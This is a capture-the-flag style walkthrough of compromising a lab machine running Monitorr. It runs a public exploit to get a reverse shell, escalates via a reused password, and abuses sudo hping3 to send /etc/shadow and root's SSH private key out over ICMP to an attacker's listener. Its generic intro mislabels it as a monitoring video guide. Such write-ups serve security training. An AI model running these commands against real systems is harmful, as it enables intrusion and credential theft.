Ultimate ICMP hping3 Monitoring Penetration Testing Guide

Welcome to the ultimate ICMP hping3 monitoring penetration testing guide! In this video, we will explore how to use hping3 for monitoring network connectivity and security using ICMP (Internet Control Message Protocol) packets.

ICMP is a vital protocol in network communication, often used for troubleshooting and monitoring network issues. Hping3 is a powerful command-line tool that allows us to send custom ICMP packets to test network connectivity, identify potential security vulnerabilities, and analyze network performance.

Throughout this guide, we will cover the basics of hping3, including how to install and use the tool, how to craft custom ICMP packets, and how to interpret the results of our tests. By the end of this video, you will have the knowledge and skills to use hping3 effectively for monitoring and pen testing purposes.

So, grab your terminal and let’s dive into the world of ICMP hping3 monitoring penetration testing!

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Identify the target

First of all, I identified the IP address of the target machine.

sudo netdiscover -i eth0 -r

Scan open ports

Next, I scanned the open ports on the target machine to get knowledge of the exposed services on the target.

nmap -v -T4 -sC -sV -p- -oN nmap.log 

From the Nmap scan result, we can see that the HTTP server has a web app Monitorr.

Github Repo: https://github.com/Monitorr/Monitorr

Enumerate the web server

The home page of the server would redirect to the following page.

From the image above, we can see the link to the repository of the web app. Furthermore, we can also see the version of the app. In my Kali Linux, I searched for any exploits of Monitorr, I got one for the same version.

searchsploit monitorr

I could directly copy the exploit to my working directory in Kali Linux. However, if you are in another distro, you can download the code from exploit-db.

searchsploit -m 48980

I checked the script and it requires LHOST and LPORT to spawn a reverse shell. Hence, I listened to port 9001 for it.

nc -nlvp 9001

Then, I executed the exploit script.

python3 48980.py 9001

This gave me a reverse shell.

Upgrade to an intelligent reverse shell

User Privilege Escalation

After I got the foothold to the system, I checked the users of it.

grep sh /etc/passwd

Here, we can see a user named fox. Thus, we can check the files inside the home directory.

There is a file โ€œreminderโ€ that says that encryption is done with a file crypt.php. Next, there is a directory devel that has execution permission for other users, but not the read/write permissions. Thus, we can guess that the file might be inside the directory.

The file had read access to all users.

Upon opening the file, we can see a text encrypted with a key โ€˜daโ€™. I tried logging in with this password for the user fox, it worked.

ssh fox@

The local flag is in the home directory of the user.

Root Privilege Escalation

First of all, I changed the shell to python. Next, I checked the sudo permissions of the user.

sudo -l

It allowed a command to run as root. Since we must use ICMP mode, we cannot spawn a shell. However, we can transfer files to a different machine. We could try sending the shadow file or try to send an SSH private key.

For this, we require to set up hping3 in listen mode in the receiver machine, whereas from the target machine, we have to send the file.

IP of the receiver machine:
IP of the target machine:

On the receiver machine, we have to do the following.

sudo hping3 -1 -9 signature -I eth0 --safe

On the target machine, we should do as follows to get the shadow file.

sudo /usr/sbin/hping3 --icmp -e signature -E /etc/shadow -d 2000 -c 1

This gave me output in my receiving machine. In the command above, -c 1 is the number of times the ping operation is performed. Since we have data size of 2000, we just need a single ping. However, you can completely change the value or exclude it to manually exit later.

I tried bruteforcing the password but had no luck. Next, I tried to get the private key using the same method.

sudo /usr/sbin/hping3 --icmp -e signature -E /root/.ssh/id_rsa -d 2000

I got the response like the following. Thus, I decided to do the same in the two different SSH instances of the target machine.

On the target machines,

# SSH instance 1
sudo hping3 --icmp --listen signature --safe
# SSH instance 2
sudo hping3 --icmp --sign signature --file /root/.ssh/id_rsa -d 4000 -c 2

Finally, I got the proper response. Next, I copied it to a file on my local machine.

vi id_rsa # Copy the key
chmod 600 id_rsa # This will restrict the private key permissions

Lastly, I could log in to the system.

ssh root@ -i id_rsa


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